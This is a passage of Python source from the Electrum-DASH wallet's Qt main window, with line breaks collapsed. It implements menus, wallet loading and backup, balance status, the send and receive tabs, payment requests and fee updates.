place the tab index = len(self.tabs) for i in range(len(self.tabs)): try: if tab.tab_pos < self.tabs.widget(i).tab_pos: index = i break except AttributeError: pass self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", "")) else: i = self.tabs.indexOf(tab) self.tabs.removeTab(i) def push_top_level_window(self, window): '''Used for e.g. tx dialog box to ensure new dialogs are appropriately parented. This used to be done by explicitly providing the parent window, but that isn't something hardware wallet prompts know.''' self.tl_windows.append(window) def pop_top_level_window(self, window): self.tl_windows.remove(window) def top_level_window(self): '''Do the right thing in the presence of tx dialog windows''' override = self.tl_windows[-1] if self.tl_windows else None return self.top_level_window_recurse(override) def diagnostic_name(self): return "%s/%s" % (PrintError.diagnostic_name(self), self.wallet.basename() if self.wallet else "None") def is_hidden(self): return self.isMinimized() or self.isHidden() def show_or_hide(self): if self.is_hidden(): self.bring_to_top() else: self.hide() def bring_to_top(self): self.show() self.raise_() def on_error(self, exc_info): if not isinstance(exc_info[1], UserCancelled): traceback.print_exception(*exc_info) self.show_error(str(exc_info[1])) def on_network(self, event, *args): if event == 'updated': self.need_update.set() self.gui_object.network_updated_signal_obj.network_updated_signal \ .emit(event, args) elif event == 'new_transaction': self.tx_notifications.append(args[0]) self.notify_transactions_signal.emit() elif event in ['status', 'banner', 'verified', 'fee', 'proposals']: # Handle in GUI thread self.network_signal.emit(event, args) else: self.print_error("unexpected network message:", event, args) def on_network_qt(self, event, args=None): # Handle a network message in the GUI thread if event == 'status': self.update_status() elif event == 'banner': self.console.showMessage(args[0]) elif event == 'verified': self.history_list.update_item(*args) elif event == 'fee': if self.config.is_dynfee(): self.fee_slider.update() self.do_update_fee() elif event == 'proposals': self.proposals_changed() else: self.print_error("unexpected network_qt signal:", event, args) def fetch_alias(self): self.alias_info = None alias = self.config.get('alias') if alias: alias = str(alias) def f(): self.alias_info = self.contacts.resolve_openalias(alias) self.alias_received_signal.emit() t = threading.Thread(target=f) t.setDaemon(True) t.start() def close_wallet(self): if self.wallet: self.print_error('close_wallet', self.wallet.storage.path) run_hook('close_wallet', self.wallet) def load_wallet(self, wallet): wallet.thread = TaskThread(self, self.on_error) self.wallet = wallet self.masternode_manager = MasternodeManager(self.wallet, self.config) self.update_recently_visited(wallet.storage.path) # address used to create a dummy transaction and estimate transaction fee self.masternode_manager.send_subscriptions() self.history_list.update() self.address_list.update() self.utxo_list.update() self.need_update.set() # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized self.notify_transactions() # update menus self.seed_menu.setEnabled(self.wallet.has_seed()) self.update_lock_icon() self.update_buttons_on_seed() self.update_console() self.clear_receive_tab() self.request_list.update() self.tabs.show() self.init_geometry() if self.config.get('hide_gui') and self.gui_object.tray.isVisible(): self.hide() else: self.show() self.watching_only_changed() run_hook('load_wallet', wallet, self) def init_geometry(self): winpos = self.wallet.storage.get("winpos-qt") try: screen = self.app.desktop().screenGeometry() assert screen.contains(QRect(*winpos)) self.setGeometry(*winpos) except: self.print_error("using default geometry") self.setGeometry(100, 100, 840, 400) def watching_only_changed(self): name = "Electrum-DASH Testnet" if NetworkConstants.TESTNET else "Electrum-DASH" title = '%s %s - %s' % (name, self.wallet.electrum_version, self.wallet.basename()) extra = [self.wallet.storage.get('wallet_type', '?')] if self.wallet.is_watching_only(): self.warn_if_watching_only() extra.append(_('watching only')) title += ' [%s]'% ', '.join(extra) self.setWindowTitle(title) self.password_menu.setEnabled(self.wallet.can_change_password()) self.import_privkey_menu.setVisible(self.wallet.can_import_privkey()) self.import_address_menu.setVisible(self.wallet.can_import_address()) self.export_menu.setEnabled(self.wallet.can_export()) def warn_if_watching_only(self): if self.wallet.is_watching_only(): msg = ' '.join([ _("This wallet is watching-only."), _("This means you will not be able to spend Dash coins with it."), _("Make sure you own the seed phrase or the private keys, before you request Dash coins to be sent to this wallet.") ]) self.show_warning(msg, title=_('Information')) def open_wallet(self): wallet_folder = self.get_wallet_folder() filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder) if not filename: return self.gui_object.new_window(filename) def backup_wallet(self): path = self.wallet.storage.path wallet_folder = os.path.dirname(path) filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder) if not filename: return new_path = os.path.join(wallet_folder, filename) if new_path != path: try: shutil.copy2(path, new_path) self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created")) except (IOError, os.error) as reason: self.show_critical(_("Electrum-DASH was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup")) def update_recently_visited(self, filename): recent = self.config.get('recently_open', []) try: sorted(recent) except: recent = [] if filename in recent: recent.remove(filename) recent.insert(0, filename) recent = recent[:5] self.config.set_key('recently_open', recent) self.recently_visited_menu.clear() for i, k in enumerate(sorted(recent)): b = os.path.basename(k) def loader(k): return lambda: self.gui_object.new_window(k) self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1))) self.recently_visited_menu.setEnabled(len(recent)) def get_wallet_folder(self): return os.path.dirname(os.path.abspath(self.config.get_wallet_path())) def new_wallet(self): wallet_folder = self.get_wallet_folder() i = 1 while True: filename = "wallet_%d" % i if filename in os.listdir(wallet_folder): i += 1 else: break full_path = os.path.join(wallet_folder, filename) self.gui_object.start_new_window(full_path, None) def init_menubar(self): menubar = QMenuBar() file_menu = menubar.addMenu(_("&File")) self.recently_visited_menu = file_menu.addMenu(_("&Recently open")) file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open) file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New) file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs) file_menu.addAction(_("Delete"), self.remove_wallet) file_menu.addSeparator() file_menu.addAction(_("&Quit"), self.close) wallet_menu = menubar.addMenu(_("&Wallet")) wallet_menu.addAction(_("&Information"), self.show_master_public_keys) wallet_menu.addSeparator() self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog) self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog) self.private_keys_menu = wallet_menu.addMenu(_("&Private keys")) self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog) self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey) self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog) self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses) wallet_menu.addSeparator() labels_menu = wallet_menu.addMenu(_("&Labels")) labels_menu.addAction(_("&Import"), self.do_import_labels) labels_menu.addAction(_("&Export"), self.do_export_labels) contacts_menu = wallet_menu.addMenu(_("Contacts")) contacts_menu.addAction(_("&New"), self.new_contact_dialog) contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts()) invoices_menu = wallet_menu.addMenu(_("Invoices")) invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices()) hist_menu = wallet_menu.addMenu(_("&History")) hist_menu.addAction("Plot", self.plot_history_dialog).setEnabled(plot_history is not None) hist_menu.addAction("Export", self.export_history_dialog) wallet_menu.addSeparator() wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F")) def add_toggle_action(view_menu, tab): is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False) item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab)) view_menu = menubar.addMenu(_("&View")) add_toggle_action(view_menu, self.addresses_tab) add_toggle_action(view_menu, self.utxo_tab) add_toggle_action(view_menu, self.contacts_tab) add_toggle_action(view_menu, self.console_tab) wallet_menu.addSeparator() wallet_menu.addAction(_("Masternodes"), self.show_masternode_dialog) tools_menu = menubar.addMenu(_("&Tools")) # Settings / Preferences are all reserved keywords in OSX using this as work around tools_menu.addAction(_("Electrum-DASH preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog) tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self)) tools_menu.addAction(_("&Plugins"), self.plugins_dialog) tools_menu.addSeparator() tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message) tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message) tools_menu.addSeparator() paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany) raw_transaction_menu = tools_menu.addMenu(_("&Load transaction")) raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file) raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text) raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid) raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode) self.raw_transaction_menu = raw_transaction_menu run_hook('init_menubar_tools', self, tools_menu) help_menu = menubar.addMenu(_("&Help")) help_menu.addAction(_("&About"), self.show_about) help_menu.addAction(_("&Official website"), lambda: webbrowser.open("http://electrum-dash.org")) help_menu.addSeparator() help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("https://docs.dash.org/en/latest/wallets/index.html#dash-electrum-wallet")).setShortcut(QKeySequence.HelpContents) help_menu.addAction(_("&Report Bug"), self.show_report_bug) help_menu.addSeparator() help_menu.addAction(_("&Donate to server"), self.donate_to_server) self.setMenuBar(menubar) def donate_to_server(self): d = self.network.get_donation_address() if d: host = self.network.get_parameters()[0] self.pay_to_URI('dash:%s?message=donation for %s'%(d, host)) else: self.show_error(_('No donation address for this server')) def show_about(self): QMessageBox.about(self, "Electrum-DASH", _("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" + _("Electrum-DASH focus is speed, with low resource usage and simplifying Dash. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Dash system." + "\n\n" + _("Uses icons from the Icons8 icon pack (icons8.com)."))) def show_report_bug(self): msg = ' '.join([ _("Please report any bugs as issues on github:<br/>"), "<a href=\"https://github.com/akhavr/electrum-dash/issues\">https://github.com/akhavr/electrum-dash/issues</a><br/><br/>", _("Before reporting a bug, upgrade to the most recent version of Electrum-DASH (latest release or git HEAD), and include the version number in your report."), _("Try to explain not only what the bug is, but how it occurs.") ]) self.show_message(msg, title="Electrum-DASH - " + _("Reporting Bugs")) def notify_transactions(self): if not self.network or not self.network.is_connected(): return self.print_error("Notifying GUI") if len(self.tx_notifications) > 0: # Combine the transactions if there are more then three tx_amount = len(self.tx_notifications) if(tx_amount >= 3): total_amount = 0 for tx in self.tx_notifications: is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx) if(v > 0): total_amount += v self.notify(_("%(txs)s new transactions received: Total amount received in the new transactions %(amount)s") \ % { 'txs' : tx_amount, 'amount' : self.format_amount_and_units(total_amount)}) self.tx_notifications = [] else: for tx in self.tx_notifications: if tx: self.tx_notifications.remove(tx) is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx) if(v > 0): self.notify(_("New transaction received: %(amount)s") % { 'amount' : self.format_amount_and_units(v)}) def notify(self, message): if self.tray: try: # this requires Qt 5.9 self.tray.showMessage("Electrum-DASH", message, QIcon(":icons/electrum_dark_icon"), 20000) except TypeError: self.tray.showMessage("Electrum-DASH", message, QSystemTrayIcon.Information, 20000) # custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user def getOpenFileName(self, title, filter = ""): directory = self.config.get('io_dir', os.path.expanduser('~')) fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter) if fileName and directory != os.path.dirname(fileName): self.config.set_key('io_dir', os.path.dirname(fileName), True) return fileName def getSaveFileName(self, title, filename, filter = ""): directory = self.config.get('io_dir', os.path.expanduser('~')) path = os.path.join( directory, filename ) fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter) if fileName and directory != os.path.dirname(fileName): self.config.set_key('io_dir', os.path.dirname(fileName), True) return fileName def connect_slots(self, sender): sender.timer_signal.connect(self.timer_actions) def timer_actions(self): # Note this runs in the GUI thread if self.need_update.is_set(): self.need_update.clear() self.update_wallet() # resolve aliases # FIXME this is a blocking network call that has a timeout of 5 sec self.payto_e.resolve() # update fee if self.require_fee_update: self.do_update_fee() self.require_fee_update = False def format_amount(self, x, is_diff=False, whitespaces=False): return format_satoshis(x, is_diff, self.num_zeros, self.decimal_point, whitespaces) def format_amount_and_units(self, amount): text = self.format_amount(amount) + ' '+ self.base_unit() x = self.fx.format_amount_and_units(amount) if text and x: text += ' (%s)'%x return text def format_fee_rate(self, fee_rate): if self.fee_unit == 0: return format_satoshis(fee_rate/1000, False, self.num_zeros, 0, False) + ' sat/byte' else: return self.format_amount(fee_rate) + ' ' + self.base_unit() + '/kB' def get_decimal_point(self): return self.decimal_point def base_unit(self): assert self.decimal_point in [2, 5, 8] if self.decimal_point == 2: return 'uDASH' if self.decimal_point == 5: return 'mDASH' if self.decimal_point == 8: return 'DASH' raise Exception('Unknown base unit') def connect_fields(self, window, btc_e, fiat_e, fee_e): def edit_changed(edit): if edit.follows: return edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet()) fiat_e.is_last_edited = (edit == fiat_e) amount = edit.get_amount() rate = self.fx.exchange_rate() if self.fx else None if rate is None or amount is None: if edit is fiat_e: btc_e.setText("") if fee_e: fee_e.setText("") else: fiat_e.setText("") else: if edit is fiat_e: btc_e.follows = True btc_e.setAmount(int(amount / Decimal(rate) * COIN)) btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) btc_e.follows = False if fee_e: window.update_fee() else: fiat_e.follows = True fiat_e.setText(self.fx.ccy_amount_str( amount * Decimal(rate) / COIN, False)) fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) fiat_e.follows = False btc_e.follows = False fiat_e.follows = False fiat_e.textChanged.connect(partial(edit_changed, fiat_e)) btc_e.textChanged.connect(partial(edit_changed, btc_e)) fiat_e.is_last_edited = False def update_status(self): if not self.wallet: return if self.network is None or not self.network.is_running(): text = _("Offline") icon = QIcon(":icons/status_disconnected.png") elif self.network.is_connected(): server_height = self.network.get_server_height() server_lag = self.network.get_local_height() - server_height # Server height can be 0 after switching to a new server # until we get a headers subscription request response. # Display the synchronizing message in that case. if not self.wallet.up_to_date or server_height == 0: text = _("Synchronizing...") icon = QIcon(":icons/status_waiting.png") elif server_lag > 1: text = _("Server is lagging (%d blocks)"%server_lag) icon = QIcon(":icons/status_lagging.png") else: c, u, x = self.wallet.get_balance() text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c)) if u: text += " [%s unconfirmed]"%(self.format_amount(u, True).strip()) if x: text += " [%s unmatured]"%(self.format_amount(x, True).strip()) # append fiat balance and price if self.fx.is_enabled(): text += self.fx.get_fiat_status_text(c + u + x, self.base_unit(), self.get_decimal_point()) or '' if not self.network.proxy: icon = QIcon(":icons/status_connected.png") else: icon = QIcon(":icons/status_connected_proxy.png") else: text = _("Not connected") icon = QIcon(":icons/status_disconnected.png") self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename())) self.balance_label.setText(text) self.status_button.setIcon( icon ) def update_wallet(self): self.update_status() if self.wallet.up_to_date or not self.network or not self.network.is_connected(): self.update_tabs() def update_tabs(self): self.history_list.update() self.request_list.update() self.address_list.update() self.utxo_list.update() self.contact_list.update() self.invoice_list.update() self.update_proposals_tab() self.update_completions() def create_history_tab(self): from .history_list import HistoryList self.history_list = l = HistoryList(self) l.searchable_list = l l.setObjectName("history_container") return l def show_address(self, addr): from . import address_dialog d = address_dialog.AddressDialog(self, addr) d.exec_() def show_transaction(self, tx, tx_desc = None): '''tx_desc is set only for txs created in the Send tab''' show_transaction(tx, self, tx_desc) def create_receive_tab(self): # A 4-column grid layout. All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.receive_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) self.receive_address_e = ButtonsLineEdit() self.receive_address_e.addCopyButton(self.app) self.receive_address_e.setReadOnly(True) msg = _('Dash address where the payment should be received. Note that each payment request uses a different Dash address.') self.receive_address_label = HelpLabel(_('Receiving address'), msg) self.receive_address_e.textChanged.connect(self.update_receive_qr) self.receive_address_e.setFocusPolicy(Qt.NoFocus) grid.addWidget(self.receive_address_label, 0, 0) grid.addWidget(self.receive_address_e, 0, 1, 1, -1) self.receive_message_e = QLineEdit() grid.addWidget(QLabel(_('Description')), 1, 0) grid.addWidget(self.receive_message_e, 1, 1, 1, -1) self.receive_message_e.textChanged.connect(self.update_receive_qr) self.receive_amount_e = BTCAmountEdit(self.get_decimal_point) grid.addWidget(QLabel(_('Requested amount')), 2, 0) grid.addWidget(self.receive_amount_e, 2, 1) self.receive_amount_e.textChanged.connect(self.update_receive_qr) self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_receive_e.setVisible(False) grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft) self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None) self.expires_combo = QComboBox() self.expires_combo.addItems([i[0] for i in expiration_values]) self.expires_combo.setCurrentIndex(3) self.expires_combo.setFixedWidth(self.receive_amount_e.width()) msg = ' '.join([ _('Expiration date of your request.'), _('This information is seen by the recipient if you send them a signed payment request.'), _('Expired requests have to be deleted manually from your list, in order to free the corresponding Dash addresses.'), _('The Dash address never expires and will always be part of this Electrum-DASH wallet.'), ]) grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0) grid.addWidget(self.expires_combo, 3, 1) self.expires_label = QLineEdit('') self.expires_label.setReadOnly(1) self.expires_label.setFocusPolicy(Qt.NoFocus) self.expires_label.hide() grid.addWidget(self.expires_label, 3, 1) self.save_request_button = QPushButton(_('Save')) self.save_request_button.clicked.connect(self.save_payment_request) self.new_request_button = QPushButton(_('New')) self.new_request_button.clicked.connect(self.new_payment_request) self.receive_qr = QRCodeWidget(fixedSize=200) self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window() self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor)) self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor)) self.receive_buttons = buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.save_request_button) buttons.addWidget(self.new_request_button) grid.addLayout(buttons, 4, 1, 1, 2) self.receive_requests_label = QLabel(_('Requests')) from .request_list import RequestList self.request_list = RequestList(self) # layout vbox_g = QVBoxLayout() vbox_g.addLayout(grid) vbox_g.addStretch() hbox = QHBoxLayout() hbox.addLayout(vbox_g) hbox.addWidget(self.receive_qr) w = QWidget() w.setObjectName("receive_container") w.searchable_list = self.request_list vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.receive_requests_label) vbox.addWidget(self.request_list) vbox.setStretchFactor(self.request_list, 1000) return w def delete_payment_request(self, addr): self.wallet.remove_payment_request(addr, self.config) self.request_list.update() self.clear_receive_tab() def get_request_URI(self, addr): req = self.wallet.receive_requests[addr] message = self.wallet.labels.get(addr, '') amount = req['amount'] URI = util.create_URI(addr, amount, message) if req.get('time'): URI += "&time=%d"%req.get('time') if req.get('exp'): URI += "&exp=%d"%req.get('exp') if req.get('name') and req.get('sig'): sig = bfh(req.get('sig')) sig = bitcoin.base_encode(sig, base=58) URI += "&name=" + req['name'] + "&sig="+sig return str(URI) def sign_payment_request(self, addr): alias = self.config.get('alias') alias_privkey = None if alias and self.alias_info: alias_addr, alias_name, validated = self.alias_info if alias_addr: if self.wallet.is_mine(alias_addr): msg = _('This payment request will be signed.') + '\n' + _('Please enter your password') password = self.password_dialog(msg) if password: try: self.wallet.sign_payment_request(addr, alias, alias_addr, password) except Exception as e: self.show_error(str(e)) return else: return else: return def save_payment_request(self): addr = str(self.receive_address_e.text()) amount = self.receive_amount_e.get_amount() message = self.receive_message_e.text() if not message and not amount: self.show_error(_('No message or amount')) return False i = self.expires_combo.currentIndex() expiration = list(map(lambda x: x[1], expiration_values))[i] req = self.wallet.make_payment_request(addr, amount, message, expiration) self.wallet.add_payment_request(req, self.config) self.sign_payment_request(addr) self.request_list.update() self.address_list.update() self.save_request_button.setEnabled(False) def view_and_paste(self, title, msg, data): dialog = WindowModalDialog(self, title) vbox = QVBoxLayout() label = QLabel(msg) label.setWordWrap(True) vbox.addWidget(label) pr_e = ShowQRTextEdit(text=data) vbox.addWidget(pr_e) vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog))) dialog.setLayout(vbox) dialog.exec_() def export_payment_request(self, addr): r = self.wallet.receive_requests.get(addr) pr = paymentrequest.serialize_request(r).SerializeToString() name = r['id'] + '.bip70' fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70") if fileName: with open(fileName, "wb+") as f: f.write(util.to_bytes(pr)) self.show_message(_("Request saved successfully")) self.saved = True def new_payment_request(self): addr = self.wallet.get_unused_address() if addr is None: if not self.wallet.is_deterministic(): msg = [ _('No more addresses in your wallet.'), _('You are using a non-deterministic wallet, which cannot create new addresses.'), _('If you want to create new addresses, use a deterministic wallet instead.') ] self.show_message(' '.join(msg)) return if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")): return addr = self.wallet.create_new_address(False) self.set_receive_address(addr) self.expires_label.hide() self.expires_combo.show() self.new_request_button.setEnabled(False) self.receive_message_e.setFocus(1) def set_receive_address(self, addr): self.receive_address_e.setText(addr) self.receive_message_e.setText('') self.receive_amount_e.setAmount(None) def clear_receive_tab(self): addr = self.wallet.get_receiving_address() or '' self.receive_address_e.setText(addr) self.receive_message_e.setText('') self.receive_amount_e.setAmount(None) self.expires_label.hide() self.expires_combo.show() def toggle_qr_window(self): from . import qrwindow if not self.qr_window: self.qr_window = qrwindow.QR_Window(self) self.qr_window.setVisible(True) self.qr_window_geometry = self.qr_window.geometry() else: if not self.qr_window.isVisible(): self.qr_window.setVisible(True) self.qr_window.setGeometry(self.qr_window_geometry) else: self.qr_window_geometry = self.qr_window.geometry() self.qr_window.setVisible(False) self.update_receive_qr() def show_send_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab)) def show_receive_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab)) def receive_at(self, addr): if not bitcoin.is_address(addr): return self.show_receive_tab() self.receive_address_e.setText(addr) self.new_request_button.setEnabled(True) def update_receive_qr(self): addr = str(self.receive_address_e.text()) amount = self.receive_amount_e.get_amount() message = self.receive_message_e.text() self.save_request_button.setEnabled((amount is not None) or (message != "")) uri = util.create_URI(addr, amount, message) self.receive_qr.setData(uri) if self.qr_window and self.qr_window.isVisible(): self.qr_window.set_content(addr, amount, message, uri) def create_send_tab(self): # A 4-column grid layout. All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.send_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) from .paytoedit import PayToEdit self.amount_e = BTCAmountEdit(self.get_decimal_point) self.payto_e = PayToEdit(self) msg = _('Recipient of the funds.') + '\n\n'\ + _('You may enter a Dash address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Dash address)') payto_label = HelpLabel(_('Pay to'), msg) grid.addWidget(payto_label, 1, 0) grid.addWidget(self.payto_e, 1, 1, 1, -1) completer = QCompleter() completer.setCaseSensitivity(False) self.payto_e.setCompleter(completer) completer.setModel(self.completions) msg = _('Description of the transaction (not mandatory).') + '\n\n'\ + _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.') description_label = HelpLabel(_('Description'), msg) grid.addWidget(description_label, 2, 0) self.message_e = MyLineEdit() grid.addWidget(self.message_e, 2, 1, 1, -1) self.from_label = QLabel(_('From')) grid.addWidget(self.from_label, 3, 0) self.from_list = MyTreeWidget(self, self.from_list_menu, ['','']) self.from_list.setHeaderHidden(True) self.from_list.setMaximumHeight(80) grid.addWidget(self.from_list, 3, 1, 1, -1) self.set_pay_from([]) msg = _('Amount to be sent.') + '\n\n' \ + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \ + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \ + _('Keyboard shortcut: type "!" to send all your coins.') amount_label = HelpLabel(_('Amount'), msg) grid.addWidget(amount_label, 4, 0) grid.addWidget(self.amount_e, 4, 1) self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_send_e.setVisible(False) grid.addWidget(self.fiat_send_e, 4, 2) self.amount_e.frozen.connect( lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly())) self.max_button = EnterButton(_("Max"), self.spend_max) self.max_button.setFixedWidth(140) grid.addWidget(self.max_button, 4, 3) hbox = QHBoxLayout() hbox.addStretch(1) grid.addLayout(hbox, 4, 4) msg = _('Dash transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\ + _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\ + _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.') self.fee_e_label = HelpLabel(_('Fee'), msg) def fee_cb(dyn, pos, fee_rate): if dyn: self.config.set_key('fee_level', pos, False) else: self.config.set_key('fee_per_kb', fee_rate, False) self.spend_max() if self.is_max else self.update_fee() self.fee_slider = FeeSlider(self, self.config, fee_cb) self.fee_slider.setFixedWidth(140) self.fee_e = BTCAmountEdit(self.get_decimal_point) if not self.config.get('show_fee', False): self.fee_e.setVisible(False) self.fee_e.textEdited.connect(self.update_fee) # This is so that when the user blanks the fee and moves on, # we go back to auto-calculate mode and put a fee back. self.fee_e.editingFinished.connect(self.update_fee) self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e) grid.addWidget(self.fee_e_label, 5, 0) grid.addWidget(self.fee_slider, 5, 1) grid.addWidget(self.fee_e, 5, 2) self.preview_button = EnterButton(_("Preview"), self.do_preview) self.preview_button.setToolTip(_('Display the details of your transactions before signing it.')) self.send_button = EnterButton(_("Send"), self.do_send) self.clear_button = EnterButton(_("Clear"), self.do_clear) buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.clear_button) buttons.addWidget(self.preview_button) buttons.addWidget(self.send_button) grid.addLayout(buttons, 6, 1, 1, 3) self.amount_e.shortcut.connect(self.spend_max) self.payto_e.textChanged.connect(self.update_fee) self.amount_e.textEdited.connect(self.update_fee) def reset_max(t): self.is_max = False self.max_button.setEnabled(not bool(t)) self.amount_e.textEdited.connect(reset_max) self.fiat_send_e.textEdited.connect(reset_max) def entry_changed(): text = "" if self.not_enough_funds: amt_color, fee_color = ColorScheme.RED, ColorScheme.RED text = _( "Not enough funds" ) c, u, x = self.wallet.get_frozen_balance() if c+u+x: text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')' elif self.fee_e.isModified(): amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.DEFAULT elif self.amount_e.isModified(): amt_color, fee_color = ColorScheme.DEFAULT, ColorScheme.BLUE else: amt_color, fee_color = ColorScheme.BLUE, ColorScheme.BLUE self.statusBar().showMessage(text) self.amount_e.setStyleSheet(amt_color.as_stylesheet()) self.fee_e.setStyleSheet(fee_color.as_stylesheet()) self.amount_e.textChanged.connect(entry_changed) self.fee_e.textChanged.connect(entry_changed) self.invoices_label = QLabel(_('Invoices')) from .invoice_list import InvoiceList self.invoice_list = InvoiceList(self) vbox0 = QVBoxLayout() vbox0.addLayout(grid) hbox = QHBoxLayout() hbox.addLayout(vbox0) w = QWidget() w.setObjectName("send_container") vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.invoices_label) vbox.addWidget(self.invoice_list) vbox.setStretchFactor(self.invoice_list, 1000) w.searchable_list = self.invoice_list run_hook('create_send_tab', grid) return w def spend_max(self): self.is_max = True self.do_update_fee() def update_fee(self): self.require_fee_update = True def get_payto_or_dummy(self): r = self.payto_e.get_recipient() if r: return r return (TYPE_ADDRESS, self.wallet.dummy_address()) def do_update_fee(self): '''Recalculate the fee. If the fee was manually input, retain it, but still build the TX to see if there are enough funds. ''' if not self.config.get('offline') and self.config.is_dynfee() and not self.config.has_fee_estimates(): self.statusBar().showMessage(_('Waiting for fee estimates...')) return False freeze_fee = (self.fee_e.isModified() and (self.fee_e.text() or self.fee_e.hasFocus())) amount = '!' if self.is_max else self.amount_e.get_amount() if amount is None: if not freeze_fee: self.fee_e.setAmount(None) self.not_enough_funds = False self.statusBar().showMessage('') else: fee = self.fee_e.get_amount() if freeze_fee else None outputs = self.payto_e.get_outputs(self.is_max) if not outputs: _type, addr = self.get_payto_or_dummy() outputs = [(_type, addr, amount)] try: is_sweep = bool(self.tx_external_keypairs) tx = self.wallet.make_unsigned_transaction( self.get_coins(), outputs, self.config, fee, is_sweep=is_sweep) self.not_enough_funds = False except NotEnoughFunds: self.not_enough_funds = True if not freeze_fee: self.fee_e.setAmount(None) return except BaseException: return if not freeze_fee: fee = None if self.not_enough_funds else tx.get_fee() self.fee_e.setAmount(fee) if self.is_max: amount = tx.output_value() self.amount_e.setAmount(amount) if fee is None: return def from_list_delete(self, item): i = self.from_list.indexOfTopLevelItem(item) self.pay_from.pop(i) self.redraw_from_list() self.update_fee() def from_list_menu(self, position): item = self.from_list.itemAt(position) menu = QMenu() menu.addAction(_("Remove"), lambda: self.from_list_delete(item)) menu.exec_(self.from_list.viewport().mapToGlobal(position)) def set_pay_from(self, coins): self.pay_from = list(coins) self.redraw_from_list() def 